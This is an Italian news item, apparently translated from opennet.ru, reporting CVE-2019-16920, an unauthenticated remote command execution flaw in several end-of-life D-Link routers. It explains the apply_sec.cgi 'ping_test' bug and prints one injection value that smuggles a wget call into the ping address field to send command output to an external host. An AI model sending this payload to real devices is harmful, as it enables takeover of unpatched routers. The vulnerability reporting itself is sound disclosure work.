Vulnerabilità sfruttabile in remoto nei router D-Link

Nei router wireless D-Link identificato vulnerabilità pericolosa (CVE-2019-16920), che permette di eseguire codice da remoto lato dispositivo inviando un'apposita richiesta al gestore “ping_test”, accessibile senza autenticazione.

È interessante notare che, secondo gli sviluppatori del firmware, la chiamata “ping_test” dovrebbe essere eseguita solo dopo l'autenticazione, ma in realtà viene richiamata comunque, indipendentemente dall'accesso all'interfaccia web. In particolare, quando si accede allo script apply_sec.cgi e si passa il parametro “action=ping_test”, lo script reindirizza alla pagina di autenticazione, ma allo stesso tempo esegue l'azione associata a ping_test. Per eseguire il codice è stata sfruttata un'altra vulnerabilità nello stesso ping_test, che richiama l'utilità ping senza verificare adeguatamente la correttezza dell'indirizzo IP inviato per il test. Ad esempio, per richiamare l'utility wget e trasferire i risultati del comando “echo 1234” su un host esterno, è sufficiente specificare il parametro “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Vulnerabilità sfruttabile in remoto nei router D-Link

La presenza della vulnerabilità è stata ufficialmente confermata nei seguenti modelli:

  • DIR-655 con firmware 3.02b05 o precedente;
  • DIR-866L con firmware 1.03b04 o precedente;
  • DIR-1565 con firmware 1.01 o precedente;
  • DIR-652 (non vengono fornite informazioni sulle versioni firmware problematiche)

Il periodo di supporto per questi modelli è già scaduto, quindi D-Link egli ha dichiarato, che non rilascerà loro aggiornamenti per eliminare la vulnerabilità, ne sconsiglia l'utilizzo e consiglia di sostituirli con nuovi dispositivi. Come soluzione alternativa alla sicurezza, è possibile limitare l'accesso all'interfaccia web solo agli indirizzi IP attendibili.

Successivamente si è scoperto che anche la vulnerabilità era colpisce modelli DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 e DIR-825, piani per il rilascio di aggiornamenti per i quali non sono ancora noti.

Fonte: opennet.ru

Aggiungi un commento